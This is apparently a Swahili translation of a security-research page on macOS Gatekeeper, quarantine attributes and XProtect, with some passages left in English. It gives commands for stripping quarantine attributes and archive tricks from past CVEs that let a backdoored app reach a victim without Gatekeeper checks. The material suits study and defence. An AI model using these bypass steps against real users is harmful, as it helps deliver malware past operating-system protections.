macOS Gatekeeper / Quarantine / XProtect

```c #include #include

enum qtn_flags { QTN_FLAG_DOWNLOAD = 0x0001, QTN_FLAG_SANDBOX = 0x0002, QTN_FLAG_HARD = 0x0004, QTN_FLAG_USER_APPROVED = 0x0040, };

#define qtn_proc_alloc _qtn_proc_alloc #define qtn_proc_apply_to_self _qtn_proc_apply_to_self #define qtn_proc_free _qtn_proc_free #define qtn_proc_init _qtn_proc_init #define qtn_proc_init_with_self _qtn_proc_init_with_self #define qtn_proc_set_flags _qtn_proc_set_flags #define qtn_file_alloc _qtn_file_alloc #define qtn_file_init_with_path _qtn_file_init_with_path #define qtn_file_free _qtn_file_free #define qtn_file_apply_to_path _qtn_file_apply_to_path #define qtn_file_set_flags _qtn_file_set_flags #define qtn_file_get_flags _qtn_file_get_flags #define qtn_proc_set_identifier _qtn_proc_set_identifier

typedef struct _qtn_proc *qtn_proc_t; typedef struct _qtn_file *qtn_file_t;

int qtn_proc_apply_to_self(qtn_proc_t); void qtn_proc_init(qtn_proc_t); int qtn_proc_init_with_self(qtn_proc_t); int qtn_proc_set_flags(qtn_proc_t, uint32_t flags); qtn_proc_t qtn_proc_alloc(); void qtn_proc_free(qtn_proc_t); qtn_file_t qtn_file_alloc(void); void qtn_file_free(qtn_file_t qf); int qtn_file_set_flags(qtn_file_t qf, uint32_t flags); uint32_t qtn_file_get_flags(qtn_file_t qf); int qtn_file_apply_to_path(qtn_file_t qf, const char *path); int qtn_file_init_with_path(qtn_file_t qf, const char path); int qtn_proc_set_identifier(qtn_proc_t qp, const char bundleid);

int main() {

qtn_proc_t qp = qtn_proc_alloc(); qtn_proc_set_identifier(qp, "xyz.hacktricks.qa"); qtn_proc_set_flags(qp, QTN_FLAG_DOWNLOAD | QTN_FLAG_USER_APPROVED); qtn_proc_apply_to_self(qp); qtn_proc_free(qp);

FILE *fp; fp = fopen("thisisquarantined.txt", "w+"); fprintf(fp, "Hello Quarantine\n"); fclose(fp);

return 0;

}

</details>

Na **ondoa** sifa hiyo kwa:
```bash
xattr -d com.apple.quarantine portada.png
#You can also remove this attribute from every file with
find . -iname '*' -print0 | xargs -0 xattr -d com.apple.quarantine

Na pata faili zote zilizokuwa katika karantini kwa kutumia:

find / -exec ls -ld {} \; 2>/dev/null | grep -E "[x\-]@ " | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.quarantine"

Taarifa za karantini pia zinahifadhiwa katika hifadhidata kuu inayosimamiwa na LaunchServices katika ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 ambayo inaruhusu GUI kupata data kuhusu asili za faili. Zaidi ya hayo, hii inaweza kubadilishwa na programu ambazo zinaweza kuwa na nia ya kuficha asili zake. Aidha, hii inaweza kufanywa kutoka kwa LaunchServices APIS.

libquarantine.dylb

Maktaba hii inatoa kazi kadhaa zinazoruhusu kubadilisha maeneo ya sifa za ziada.

APIs za qtn_file_* zinahusiana na sera za karantini za faili, APIs za qtn_proc_* zinatumika kwa michakato (faili zilizoundwa na mchakato). Kazi zisizotolewa za __qtn_syscall_quarantine* ndizo zinazotumia sera ambazo zinaita mac_syscall na "Karantini" kama hoja ya kwanza ambayo inatuma maombi kwa Quarantine.kext.

Quarantine.kext

Kipanuzi cha kernel kinapatikana tu kupitia cache ya kernel kwenye mfumo; hata hivyo, unaweza kupakua Kernel Debug Kit kutoka https://developer.apple.com/, ambayo itakuwa na toleo lililosimbwa la kipanuzi.

Kext hii itashughulikia kupitia MACF simu kadhaa ili kunasa matukio yote ya mzunguko wa faili: Uundaji, ufunguzi, kubadilisha jina, kuunganisha ngumu... hata setxattr ili kuzuia kuweka sifa ya ziada ya com.apple.quarantine.

Pia inatumia MIB kadhaa:

• security.mac.qtn.sandbox_enforce: Lazimisha karantini pamoja na Sandbox

• security.mac.qtn.user_approved_exec: Michakato iliyowekwa karantini inaweza tu kutekeleza faili zilizothibitishwa

XProtect

XProtect ni kipengele cha anti-malware kilichojengwa ndani ya macOS. XProtect inaangalia programu yoyote inapozinduliwa au kubadilishwa kwa mara ya kwanza dhidi ya hifadhidata yake ya malware inayojulikana na aina za faili zisizo salama. Unapopakua faili kupitia programu fulani, kama Safari, Mail, au Messages, XProtect moja kwa moja inachunguza faili hiyo. Ikiwa inalingana na malware yoyote inayojulikana katika hifadhidata yake, XProtect itazuia faili hiyo isifanye kazi na kukujulisha kuhusu tishio hilo.

Hifadhidata ya XProtect inasasishwa mara kwa mara na Apple kwa ufafanuzi mpya wa malware, na sasisho hizi zinapakuliwa na kufungwa kiotomatiki kwenye Mac yako. Hii inahakikisha kwamba XProtect iko daima na habari za hivi karibuni kuhusu vitisho vinavyojulikana.

Hata hivyo, inafaa kutambua kwamba XProtect si suluhisho kamili la antivirus. Inakagua tu orodha maalum ya vitisho vinavyojulikana na haisahihishi skanning ya upatikanaji kama programu nyingi za antivirus.

Unaweza kupata taarifa kuhusu sasisho la hivi karibuni la XProtect ukikimbia:

system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistConfigData" | tail -n 5

XProtect iko kwenye. SIP iliyo na ulinzi katika /Library/Apple/System/Library/CoreServices/XProtect.bundle na ndani ya bundle unaweza kupata taarifa ambazo XProtect inatumia:

• XProtect.bundle/Contents/Resources/LegacyEntitlementAllowlist.plist: Inaruhusu msimbo wenye cdhashes hizo kutumia haki za zamani.

• XProtect.bundle/Contents/Resources/XProtect.meta.plist: Orodha ya plugins na nyongeza ambazo haziruhusiwi kupakia kupitia BundleID na TeamID au kuashiria toleo la chini.

• XProtect.bundle/Contents/Resources/XProtect.yara: Sheria za Yara kugundua malware.

• XProtect.bundle/Contents/Resources/gk.db: Hifadhidata ya SQLite3 yenye hashes za programu zilizozuiwa na TeamIDs.

Kumbuka kwamba kuna App nyingine katika /Library/Apple/System/Library/CoreServices/XProtect.app inayohusiana na XProtect ambayo haihusiki na mchakato wa Gatekeeper.

Si Gatekeeper

Kumbuka kwamba Gatekeeper haiendeshwi kila wakati unapotekeleza programu, ni AppleMobileFileIntegrity (AMFI) tu itakay thibitisha saini za msimbo wa kutekeleza unapotekeleza app ambayo tayari imeendeshwa na kuthibitishwa na Gatekeeper.

Hivyo, hapo awali ilikuwa inawezekana kutekeleza app ili kuikatia akiba na Gatekeeper, kisha kubadilisha faili zisizotekelezwa za programu (kama Electron asar au NIB files) na ikiwa hakuna ulinzi mwingine ulio kuwekwa, programu hiyo ilikuwa ikiendeshwa na nyongeza za hatari.

Hata hivyo, sasa hii haiwezekani kwa sababu macOS inazuia kubadilisha faili ndani ya bundles za programu. Hivyo, ukijaribu shambulio la Dirty NIB, utagundua kwamba si tena inawezekana kulitumia kwa sababu baada ya kutekeleza app ili kuikatia akiba na Gatekeeper, huwezi kubadilisha bundle. Na ikiwa badala yake unabadilisha jina la saraka ya Contents kuwa NotCon (kama ilivyoonyeshwa katika exploit), kisha kutekeleza binary kuu ya app ili kuikatia akiba na Gatekeeper, itasababisha kosa na haitatekelezwa.

Mipango ya Kuepuka Gatekeeper

Njia yoyote ya kuepuka Gatekeeper (kufanikiwa kumfanya mtumiaji apakue kitu na kukitekeleza wakati Gatekeeper inapaswa kukataa) inachukuliwa kuwa udhaifu katika macOS. Hizi ni baadhi ya CVEs zilizotolewa kwa mbinu ambazo ziliruhusu kuepuka Gatekeeper katika siku za nyuma:

CVE-2021-1810

Ilionekana kwamba ikiwa Archive Utility inatumika kwa uchimbaji, faili zenye njia zinazozidi herufi 886 hazipati sifa ya ziada ya com.apple.quarantine. Hali hii bila kukusudia inaruhusu faili hizo kuepuka ukaguzi wa usalama wa Gatekeeper.

Angalia ripoti ya asili kwa maelezo zaidi.

CVE-2021-30990

Wakati programu inaundwa kwa Automator, taarifa kuhusu kile inachohitaji kutekeleza iko ndani ya application.app/Contents/document.wflow si katika executable. Executable ni binary ya jumla ya Automator inayoitwa Automator Application Stub.

Hivyo, unaweza kufanya application.app/Contents/MacOS/Automator\ Application\ Stub ielekeze kwa kiungo cha alama kwa Automator Application Stub nyingine ndani ya mfumo na itatekeleza kile kilichomo ndani ya document.wflow (script yako) bila kuamsha Gatekeeper kwa sababu executable halisi haina xattr ya karantini.

Mfano wa eneo linalotarajiwa: /System/Library/CoreServices/Automator\ Application\ Stub.app/Contents/MacOS/Automator\ Application\ Stub

Angalia ripoti ya asili kwa maelezo zaidi.

CVE-2022-22616

Katika kuepuka hii, faili ya zip iliundwa na programu ikianza kubana kutoka application.app/Contents badala ya application.app. Hivyo, sifa ya karantini ilitumika kwa faili zote kutoka application.app/Contents lakini siyo kwa application.app, ambayo ilikuwa inakaguliwa na Gatekeeper, hivyo Gatekeeper iliepukwa kwa sababu wakati application.app ilipohamasishwa haikuwa na sifa ya karantini.

zip -r test.app/Contents test.zip

Check the original report for more information.

CVE-2022-32910

Hata kama vipengele ni tofauti, matumizi ya udhaifu huu ni sawa sana na ule wa awali. Katika kesi hii, tutaunda Apple Archive kutoka application.app/Contents ili application.app isipate sifa ya karantini wakati inakunjwa na Archive Utility.

aa archive -d test.app/Contents -o test.app.aar

Check the original report for more information.

CVE-2022-42821

ACL writeextattr inaweza kutumika kuzuia mtu yeyote kuandika sifa katika faili:

touch /tmp/no-attr
chmod +a "everyone deny writeextattr" /tmp/no-attr
xattr -w attrname vale /tmp/no-attr
xattr: [Errno 13] Permission denied: '/tmp/no-attr'

Moreover, AppleDouble file format copies a file including its ACEs.

In the source code it's possible to see that the ACL text representation stored inside the xattr called com.apple.acl.text is going to be set as ACL in the decompressed file. So, if you compressed an application into a zip file with AppleDouble file format with an ACL that prevents other xattrs to be written to it... the quarantine xattr wasn't set into de application:

chmod +a "everyone deny write,writeattr,writeextattr" /tmp/test
ditto -c -k test test.zip
python3 -m http.server
# Download the zip from the browser and decompress it, the file should be without a quarantine xattr

Angalia ripoti asilia kwa maelezo zaidi.

Kumbuka kwamba hii inaweza pia kutumika kwa AppleArchives:

mkdir app
touch app/test
chmod +a "everyone deny write,writeattr,writeextattr" app/test
aa archive -d app -o test.aar

CVE-2023-27943

Iligundulika kwamba Google Chrome haikuwa ikipanga sifa ya karantini kwa faili zilizopakuliwa kwa sababu ya matatizo fulani ya ndani ya macOS.

CVE-2023-27951

Mifumo ya faili ya AppleDouble huhifadhi sifa za faili katika faili tofauti inayaanza na ._, hii husaidia kuhamasisha sifa za faili katika mashine za macOS. Hata hivyo, ilionekana kwamba baada ya kufungua faili ya AppleDouble, faili inayaanza na ._ haikupatiwa sifa ya karantini.

mkdir test
echo a > test/a
echo b > test/b
echo ._a > test/._a
aa archive -d test/ -o test.aar

# If you downloaded the resulting test.aar and decompress it, the file test/._a won't have a quarantitne attribute

Kuweza kuunda faili ambayo haitakuwa na sifa ya karantini, ilikuwa inawezekana kupita Gatekeeper. Njia ilikuwa kuunda programu ya faili la DMG kwa kutumia kanuni ya jina la AppleDouble (anza nayo ._) na kuunda faili inayoonekana kama kiungo cha alama kwa faili hii iliyofichwa bila sifa ya karantini. Wakati faili la dmg linatekelezwa, kwa kuwa halina sifa ya karantini litapita Gatekeeper.

# Create an app bundle with the backdoor an call it app.app

echo "[+] creating disk image with app"
hdiutil create -srcfolder app.app app.dmg

echo "[+] creating directory and files"
mkdir
mkdir -p s/app
cp app.dmg s/app/._app.dmg
ln -s ._app.dmg s/app/app.dmg

echo "[+] compressing files"
aa archive -d s/ -o app.aar

uchg (from this talk)

• Unda directory inayojumuisha app.

• Ongeza uchg kwenye app.

• Funga app kuwa faili ya tar.gz.

• Tuma faili ya tar.gz kwa mwathirika.

• Mwathirika anafungua faili ya tar.gz na kuendesha app.

• Gatekeeper haitakagua app.

Zuia Quarantine xattr

Katika kifurushi cha ".app" ikiwa xattr ya quarantine haijongezwa, wakati wa kuendesha Gatekeeper haitasababisha.